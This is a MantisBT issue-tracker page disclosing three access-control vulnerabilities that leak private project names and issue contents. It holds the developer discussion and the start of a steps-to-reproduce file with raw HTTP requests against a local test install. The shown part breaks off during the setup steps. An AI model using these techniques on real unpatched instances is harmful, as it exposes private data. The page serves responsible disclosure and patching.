View Issue Details

IDProjectCategoryView StatusLast Update
0027357mantisbtsecuritypublic2021-01-08 06:17
Reporterd3vpoo1 Assigned Todregad  
PriorityimmediateSeveritymajorReproducibilityalways
Status closedResolutionfixed 
PlatformWindowsOSWindowsOS VersionWindows 10
Target Version2.24.4Fixed in Version2.24.4 
Summary0027357: Attacker can leak private information via different functionality
Description

This allows the attacker to leaked the private issues belong on a private project

EDIT: dregad
This report actually covers 3 distinct vulnerabilities, which are tracked in distinct issues

  1. 0027726: disclosure of private project name - CVE-2020-29603
  2. 0027727: disclosure of private issue summary - CVE-2020-29605
  3. 0027727: full disclosure of private issue contents, including bugnotes and attachments - CVE-2020-29604
Steps To Reproduce

Original steps to reproduce have been moved to attached file, see 0027357:0064772.

Additional Information

I found this to be a critical exploit and need to report immediately.

TagsNo tags attached.

Relationships

parent of 0027726 closeddregad CVE-2020-29603: Disclosure of private project name 
parent of 0027727 closeddregad CVE-2020-29605: Disclosure of private issue summary 
parent of 0027728 closeddregad CVE-2020-29604: Full disclosure of private issue contents, including bugnotes and attachments 

Activities

dregad

dregad

2020-09-27 12:46

developer   ~0064498

Your reports are so hard to follow, due to the information being drown in the full, raw HTTP requests/responses...
It would help a lot to get an understanding of the problem and follow the steps to reproduce if instead you provided simple steps to follow through MantisBT GUI and only resorting to posting requests when strictly necessary.

Anyway, I'll go and try to wrap my head around this one now...

d3vpoo1

d3vpoo1

2020-09-27 16:10

reporter   ~0064499

Maybe a useful video, in this scenario I decide to create a new instance of Mantis everything here is by default no code modification

Link : PoC

  • In this video it just only show the copy functionality so the other functionality like,delete (which leaks the title of the private issue) is not recorded

Note : Please mention me after you watch the PoC so I can delete it (I can't post here... 10MB video)

dregad

dregad

2020-12-06 12:46

developer   ~0064758

The patch in ~0064617 fixes the following issue (described at the top of the Attacker Init section in the above Steps to reproduce).

I notice that when the attacker visit the http://localhost/mantisbt/mantisbt-2.24.3/manage_proj_edit_page.php?project_id=PRIVATE_PROJECT_ID the project title can be disclose, it returns access denied but the dropdown for projects render the title of the project

The bug is confirmed, I'll prepare a slightly modified and improved patch.

dregad

dregad

2020-12-06 16:56

developer   ~0064759

Last edited: 2020-12-06 16:56

Note : I notice that the Assigned to Me (Unresolved) have different number of parameters,the bug_arr_all=all is required, go select the Assigned to Me (Unresolved) compare to unassigned which doesn't have bug_arr_all=all

I'm not sure what you mean by that. I assume you're referring to the My View page boxes Assigned to Me (Unresolved) and unassigned and the temporary filters that are applied when clicking on View Issues button from there. This triggers in both cases, a GET request with a single filter parameter.

Ticking the Select All box then picking Copy from the select submits a POST request on bug_actiongroup_page.php, with the same parameters in both cases : bug_arr[], bug_arr_all and action.

Can you please clarify ?

dregad

dregad

2020-12-06 17:08

developer   ~0064760

And by the way the vulnerability is confirmed.

d3vpoo1

d3vpoo1

2020-12-06 18:35

reporter   ~0064761

Note : I notice that the Assigned to Me (Unresolved) have different number of parameters,the bug_arr_all=all is required, go select the Assigned to Me (Unresolved) compare to unassigned which doesn't have bug_arr_all=all

I believe I included this for a reason that some of functionality doesn't have bug_arr_all parameter (I just included for additional infomation, In case you test the bug...)

dregad

dregad

2020-12-06 18:37

developer   ~0064762

@d3vpoo1 so after testing, as I understand it there are 3 distinct vulnerabilities in this report :

  1. disclosure of private project name (see 0027357:0064758)
  2. disclosure of private issue summary via crafted call to bug_actiongroup_page.php
  3. full disclosure of private issue contents, including bugnotes and attachments, via bug_actiongroup.php COPY action

Let me know if I missed anything.
I will create separate issues for tracking and request CVEs for these.

The good news is that the fixes are quite straightforward, unlike 0027370 which gave me some trouble due to the large number of test cases.

dregad

dregad

2020-12-06 18:46

developer   ~0064763

Last edited: 2020-12-07 03:16

I believe I included this for a reason that some of functionality doesn't have bug_arr_all parameter (I just included for additional infomation, In case you test the bug...)

As far as I can tell, bug_arr_all is not used anywhere in the code (anymore); I think it might have been used in the past, possibly before version 2.0 but I don't have the time to investigate in detail.

EDIT:

not used anywhere in the code

To clarify, I meant in PHP code. It is referenced in common.js, to implement the mechanism by which the individual issue checkboxes are (un)ticked when Select All is clicked

dregad

dregad

2020-12-07 18:40

developer   ~0064772

Original steps to reproduce

27357_steps_to_reproduce.md (64,730 bytes)   
### Initialize 

- As admin create two projects one public and a private project


### Access? What access

- Go to manager (in this case he serves as the attacker)

- In order to prove that we currently don't have access you can go to

[http://localhost/mantisbt/mantisbt-2.24.3/manage_proj_edit_page.php?project_id=2](http://localhost/mantisbt/mantisbt-2.24.3/manage_proj_edit_page.php?project_id=2) - private project
[http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=1](http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=1) - issue belong to a private project

- It should return ``Access Denied.``

### Initialize scenario

- As admin report an issue to your the private project

**Request**

```
POST /mantisbt/mantisbt-2.24.3/bug_report.php?posted=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------373865978329646363701737804542
Content-Length: 2515
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/bug_report_page.php
Cookie: MANTIS_collapse_settings=|sidebar:0; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_PROJECT_COOKIE=2; MANTIS_MANAGE_CONFIG_COOKIE=0%3A1%3A-2; PHPSESSID=cbhds6ef6rlv01qob6eck59mjk; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=d4bc9ab210dcc813246fd03cd1c352ee0904b8196eafc0fa7a1572d1838dbaa6; MANTIS_BUG_LIST_COOKIE=1
Upgrade-Insecure-Requests: 1

-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="bug_report_token"

20200927nVFRNDA3foc7zbvDhVjrA1a8sWl3Fe_S
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="m_id"

0
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="project_id"

2
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="category_id"

1
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="reproducibility"

90
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="severity"

20
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="priority"

20
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="platform"


-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="os"


-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="os_build"


-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="handler_id"

1
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="summary"

This is my private issue please dont access me
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="description"

This is my private issue please dont access me
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="steps_to_reproduce"

This is my private issue please dont access me
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="additional_info"

This is my private issue please dont access me
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="tag_string"


-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="tag_select"

0
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="max_file_size"

5000000
-----------------------------373865978329646363701737804542
Content-Disposition: form-data; name="view_state"

10
-----------------------------373865978329646363701737804542--

```


**Response**

```
HTTP/1.1 200 OK
Date: Sat, 26 Sep 2020 23:29:50 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 26 Sep 2020 23:29:50 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sat, 26 Sep 2020 23:29:50 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 10556
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
	<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
	<title>MantisBT</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/default.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/status_config.php?cache_key=dfc7ac70d13aae81b44f6900789629a8" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/dropzone-5.5.0.min.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-3.4.1.min.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/font-awesome-4.6.3.min.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/fonts.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-datetimepicker-4.17.47.min.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace.min.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-mantis.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-skins.min.css" />

	<link rel="shortcut icon" href="/mantisbt/mantisbt-2.24.3/images/favicon.ico" type="image/x-icon" />
	<link rel="search" type="application/opensearchdescription+xml" title="MantisBT: full-text search" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=text"/>
	<link rel="search" type="application/opensearchdescription+xml" title="MantisBT: search by Issue Id" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=id"/>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/javascript_config.php?cache_key=dfc7ac70d13aae81b44f6900789629a8"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/javascript_translations.php?cache_key=38fd4ec05f3127949acd785e9a18aaab"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/jquery-2.2.4.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/dropzone-5.5.0.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/common.js"></script>
	<meta http-equiv="Refresh" content="2; URL=http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=7" />
</head>
<body class="skin-3">
<style>
* { font-family: "Open Sans"; } 
h1, h2, h3, h4, h5 { font-family: "Open Sans"; } 
</style>
<div id="navbar" class="navbar navbar-default navbar-collapse navbar-fixed-top noprint"><div id="navbar-container" class="navbar-container"><button id="menu-toggler" type="button" class="navbar-toggle menu-toggler pull-left hidden-lg hidden-md" data-target="#sidebar"><span class="sr-only">Toggle sidebar</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><div class="navbar-header"><a href="/mantisbt/mantisbt-2.24.3/my_view_page.php" class="navbar-brand"><span class="smaller-75"> MantisBT </span></a><button type="button" class="navbar-toggle navbar-toggle collapsed pull-right hidden-sm hidden-md hidden-lg" data-toggle="collapse" data-target=".navbar-buttons,.navbar-menu"><span class="sr-only">Toggle user menu</span><i class="ace-icon fa fa-user fa-2x white"></i> </button></div><div class="navbar-buttons navbar-header navbar-collapse collapse"><ul class="nav ace-nav"><li class="hidden-sm hidden-xs"><div class="btn-group btn-corner padding-right-8 padding-left-8"><a class="btn btn-primary btn-sm" href="bug_report_page.php"><i class="fa fa-edit"></i> Report Issue</a><a class="btn btn-primary btn-sm" href="manage_user_create_page.php"><i class="fa fa-user-plus"></i> Invite Users</a></div></li><li class="grey" id="dropdown_projects_menu">
<a data-toggle="dropdown" href="#" class="dropdown-toggle">
 second project 
 <i class="ace-icon fa fa-angle-down bigger-110"></i>
</a>
<ul id="projects-list" class=" dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close">
<li><div class="projects-searchbox"><input class="search form-control input-md" placeholder="Search" /></div></li><li class="divider"></li>
<li><div class="scrollable-menu"><ul class="list dropdown-yellow no-margin"><li><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=0">All Projects </a></li>
<li class="divider"></li>
<li><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=1" class="project-link"> first project </a></li>
<li class="active"><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=2" class="project-link"> second project </a></li>
</ul></div></li></ul>
</li>
<li class="grey"><a data-toggle="dropdown" href="#" class="dropdown-toggle"><i class="ace-icon fa fa-user fa-2x white"></i> <span class="user-info">administrator</span><i class="ace-icon fa fa-angle-down"></i></a><ul class="user-menu dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"><li><a href="/mantisbt/mantisbt-2.24.3/account_page.php"><i class="ace-icon fa fa-user"> </i> My Account</a></li><li><a href="http://localhost/mantisbt/mantisbt-2.24.3/issues_rss.php?username=administrator&key=R0qQ3AFTKVZMdV0vM5H-l-aYvaUBRnslcO85AABBH0L34Tbmvv2ZLGyOp5-I_MND7FKU87uq5QaZVBoeevI-&project_id=2"><i class="ace-icon fa fa-rss-square orange"> </i> RSS</a></li><li class="divider"></li><li><a href="/mantisbt/mantisbt-2.24.3/logout_page.php"><i class="ace-icon fa fa-sign-out"> </i> Logout</a></li></ul></li></ul></div></div></div><div class="main-container" id="main-container">
<div id="sidebar" class="sidebar sidebar-fixed responsive compact "><ul class="nav nav-list"><li>
<a href="/mantisbt/mantisbt-2.24.3/my_view_page.php">
<i class="menu-icon fa fa-dashboard"></i> 
<span class="menu-text"> My View </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt/mantisbt-2.24.3/view_all_bug_page.php">
<i class="menu-icon fa fa-list-alt"></i> 
<span class="menu-text"> View Issues </span>
</a>
<b class="arrow"></b>
</li>
<li class="active">
<a href="/mantisbt/mantisbt-2.24.3/bug_report_page.php">
<i class="menu-icon fa fa-edit"></i> 
<span class="menu-text"> Report Issue </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt/mantisbt-2.24.3/changelog_page.php">
<i class="menu-icon fa fa-retweet"></i> 
<span class="menu-text"> Change Log </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt/mantisbt-2.24.3/roadmap_page.php">
<i class="menu-icon fa fa-road"></i> 
<span class="menu-text"> Roadmap </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt/mantisbt-2.24.3/summary_page.php">
<i class="menu-icon fa fa-bar-chart-o"></i> 
<span class="menu-text"> Summary </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt/mantisbt-2.24.3/manage_overview_page.php">
<i class="menu-icon fa fa-gears"></i> 
<span class="menu-text"> Manage </span>
</a>
<b class="arrow"></b>
</li>
</ul><div id="sidebar-btn" class="sidebar-toggle sidebar-collapse"><i data-icon2="ace-icon fa fa-angle-double-right" data-icon1="ace-icon fa fa-angle-double-left"
		class="ace-icon fa fa-angle-double-left"></i></div></div><div class="main-content">
<div id="breadcrumbs" class="breadcrumbs noprint">
<ul class="breadcrumb">
  <li><i class="fa fa-user home-icon active"></i>  <a href="/mantisbt/mantisbt-2.24.3/account_page.php">administrator</a>
  <span class="label hidden-xs label-default arrowed">administrator</span></li>
</ul>
<div class="nav-recent hidden-xs">Recently Visited: <a href="/mantisbt/mantisbt-2.24.3/view.php?id=7" title="[assigned] This is my private issue please dont access me">0000007</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=1" title="[new] this is my private project">0000001</a></div><div id="nav-search" class="nav-search"><form class="form-search" method="post" action="/mantisbt/mantisbt-2.24.3/jump_to_bug.php"><span class="input-icon"><input type="text" name="bug_id" autocomplete="off" class="nav-search-input" placeholder="Issue #"><i class="ace-icon fa fa-search nav-search-icon"></i></span></form></div>
</div>
  <div class="page-content">
<div class="row">
<div class="container-fluid"><div class="col-md-12 col-xs-12"><div class="space-0"></div><div class="alert alert-success center"><p class="bold bigger-110">Operation successful.</p><br /><div class="btn-group"><a class="btn btn-primary btn-white btn-round " href="view.php?id=7">View Submitted Issue 7</a><a class="btn btn-primary btn-white btn-round " href="view_all_bug_page.php">View Issues</a></div></div></div></div>
</div>
</div>
</div>
<div class="clearfix"></div>
<div class="space-20"></div>
<div class="footer noprint">
<div class="footer-inner">
<div class="footer-content">
<div class="col-md-6 col-xs-12 no-padding">
<address>
<strong>Powered by <a href="https://www.mantisbt.org" title="bug tracking software">MantisBT </a></strong> <br>
<small>Copyright © 2000 - 2020 MantisBT Team</small><br><small>Contact <a href="mailto:webmaster@example.com" title="Contact the webmaster via e-mail.">administrator</a> for assistance</small><br>
</address>
</div>
<div class="col-md-6 col-xs-12">
<div class="pull-right" id="powered-by-mantisbt-logo">
<a href="https://www.mantisbt.org" title="Mantis Bug Tracker: a free and open source web based bug tracking system."><img src="/mantisbt/mantisbt-2.24.3/images/mantis_logo.png" width="102" height="35" alt="Powered by Mantis Bug Tracker: a free and open source web based bug tracking system." /></a>
</div>
</div>
</div>
</div>
</div>
<a class="btn-scroll-up btn btn-sm btn-inverse display" id="btn-scroll-up" href="#">
<i class="ace-icon fa fa-angle-double-up icon-only bigger-110"></i>
</a>
</div>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-3.4.1.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/moment-with-locales-2.24.0.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-datetimepicker-4.17.47.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/typeahead.jquery-1.3.0.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/list-1.5.0.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/ace.min.js"></script>
</body>
</html>
```

### Attacker init

> This is just additonal information you can disregard this issue but because of internet connection issues I notice that when the attacker visit the http://localhost/mantisbt/mantisbt-2.24.3/manage_proj_edit_page.php?project_id=<PRIVATE_PROJECT_ID> the project title can be disclose, it returns ``access denied`` but the dropdown for projects render the title of the project

- There are two ways to initialize for the attacker, the attacker have old report or the attacker can report a new issue, I will just use the create a new issue

**Request**

```
POST /mantisbt/mantisbt-2.24.3/bug_report.php?posted=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------427049419225960153701985913573
Content-Length: 2423
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/bug_report_page.php
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=6%2C4%2C5%2C3%2C2
Upgrade-Insecure-Requests: 1

-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="bug_report_token"

20200927Y7C9GOAmlETk2ohCgpLe0qIr2hRhYMgm
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="m_id"

0
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="project_id"

1
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="category_id"

1
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="reproducibility"

10
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="severity"

20
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="priority"

30
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="platform"


-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="os"


-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="os_build"


-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="handler_id"

2
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="summary"

Hello I am the attacker
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="description"

Hello I am the attacker
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="steps_to_reproduce"

Hello I am the attacker
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="additional_info"

Hello I am the attacker
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="tag_string"


-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="tag_select"

0
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="max_file_size"

5000000
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="view_state"

10
-----------------------------427049419225960153701985913573--

```

**Response**

```
HTTP/1.1 200 OK
Date: Sat, 26 Sep 2020 23:34:54 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 26 Sep 2020 23:34:54 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sat, 26 Sep 2020 23:34:54 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 10525
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
	<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
	<title>MantisBT</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/default.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/status_config.php?cache_key=e588734b679b1257c1e1720ce2aca5d6" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/dropzone-5.5.0.min.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-3.4.1.min.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/font-awesome-4.6.3.min.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/fonts.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-datetimepicker-4.17.47.min.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace.min.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-mantis.css" />
	<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-skins.min.css" />

	<link rel="shortcut icon" href="/mantisbt/mantisbt-2.24.3/images/favicon.ico" type="image/x-icon" />
	<link rel="search" type="application/opensearchdescription+xml" title="MantisBT: full-text search" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=text"/>
	<link rel="search" type="application/opensearchdescription+xml" title="MantisBT: search by Issue Id" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=id"/>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/javascript_config.php?cache_key=e588734b679b1257c1e1720ce2aca5d6"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/javascript_translations.php?cache_key=38fd4ec05f3127949acd785e9a18aaab"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/jquery-2.2.4.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/dropzone-5.5.0.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/common.js"></script>
	<meta http-equiv="Refresh" content="2; URL=http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8" />
</head>
<body class="skin-3">
<style>
* { font-family: "Open Sans"; } 
h1, h2, h3, h4, h5 { font-family: "Open Sans"; } 
</style>
<div id="navbar" class="navbar navbar-default navbar-collapse navbar-fixed-top noprint"><div id="navbar-container" class="navbar-container"><button id="menu-toggler" type="button" class="navbar-toggle menu-toggler pull-left hidden-lg hidden-md" data-target="#sidebar"><span class="sr-only">Toggle sidebar</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><div class="navbar-header"><a href="/mantisbt/mantisbt-2.24.3/my_view_page.php" class="navbar-brand"><span class="smaller-75"> MantisBT </span></a><button type="button" class="navbar-toggle navbar-toggle collapsed pull-right hidden-sm hidden-md hidden-lg" data-toggle="collapse" data-target=".navbar-buttons,.navbar-menu"><span class="sr-only">Toggle user menu</span><i class="ace-icon fa fa-user fa-2x white"></i> </button></div><div class="navbar-buttons navbar-header navbar-collapse collapse"><ul class="nav ace-nav"><li class="hidden-sm hidden-xs"><div class="btn-group btn-corner padding-right-8 padding-left-8"><a class="btn btn-primary btn-sm" href="bug_report_page.php"><i class="fa fa-edit"></i> Report Issue</a></div></li><li class="grey" id="dropdown_projects_menu">
<a data-toggle="dropdown" href="#" class="dropdown-toggle">
 first project 
 <i class="ace-icon fa fa-angle-down bigger-110"></i>
</a>
<ul id="projects-list" class=" dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close">
<li><div class="projects-searchbox"><input class="search form-control input-md" placeholder="Search" /></div></li><li class="divider"></li>
<li><div class="scrollable-menu"><ul class="list dropdown-yellow no-margin"><li><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=0">All Projects </a></li>
<li class="divider"></li>
<li class="active"><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=1" class="project-link"> first project </a></li>
</ul></div></li></ul>
</li>
<li class="grey"><a data-toggle="dropdown" href="#" class="dropdown-toggle"><i class="ace-icon fa fa-user fa-2x white"></i> <span class="user-info">manager</span><i class="ace-icon fa fa-angle-down"></i></a><ul class="user-menu dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"><li><a href="/mantisbt/mantisbt-2.24.3/account_page.php"><i class="ace-icon fa fa-user"> </i> My Account</a></li><li><a href="http://localhost/mantisbt/mantisbt-2.24.3/issues_rss.php?username=manager&key=iLKFE3m8D11EdAtHoGxboYzcPjG11f41lnnKeXpgsf4e6v2261dcSSKrWrKg6fIjSj-E-Upq9mkaxxA22-QW&project_id=1"><i class="ace-icon fa fa-rss-square orange"> </i> RSS</a></li><li class="divider"></li><li><a href="/mantisbt/mantisbt-2.24.3/logout_page.php"><i class="ace-icon fa fa-sign-out"> </i> Logout</a></li></ul></li></ul></div></div></div><div class="main-container" id="main-container">
<div id="sidebar" class="sidebar sidebar-fixed responsive compact "><ul class="nav nav-list"><li>
<a href="/mantisbt/mantisbt-2.24.3/my_view_page.php">
<i class="menu-icon fa fa-dashboard"></i> 
<span class="menu-text"> My View </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt/mantisbt-2.24.3/view_all_bug_page.php">
<i class="menu-icon fa fa-list-alt"></i> 
<span class="menu-text"> View Issues </span>
</a>
<b class="arrow"></b>
</li>
<li class="active">
<a href="/mantisbt/mantisbt-2.24.3/bug_report_page.php">
<i class="menu-icon fa fa-edit"></i> 
<span class="menu-text"> Report Issue </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt/mantisbt-2.24.3/changelog_page.php">
<i class="menu-icon fa fa-retweet"></i> 
<span class="menu-text"> Change Log </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt/mantisbt-2.24.3/roadmap_page.php">
<i class="menu-icon fa fa-road"></i> 
<span class="menu-text"> Roadmap </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt/mantisbt-2.24.3/summary_page.php">
<i class="menu-icon fa fa-bar-chart-o"></i> 
<span class="menu-text"> Summary </span>
</a>
<b class="arrow"></b>
</li>
<li>
<a href="/mantisbt/mantisbt-2.24.3/manage_overview_page.php">
<i class="menu-icon fa fa-gears"></i> 
<span class="menu-text"> Manage </span>
</a>
<b class="arrow"></b>
</li>
</ul><div id="sidebar-btn" class="sidebar-toggle sidebar-collapse"><i data-icon2="ace-icon fa fa-angle-double-right" data-icon1="ace-icon fa fa-angle-double-left"
		class="ace-icon fa fa-angle-double-left"></i></div></div><div class="main-content">
<div id="breadcrumbs" class="breadcrumbs noprint">
<ul class="breadcrumb">
  <li><i class="fa fa-user home-icon active"></i>  <a href="/mantisbt/mantisbt-2.24.3/account_page.php">manager ( manager ) </a>
  <span class="label hidden-xs label-default arrowed">manager</span></li>
</ul>
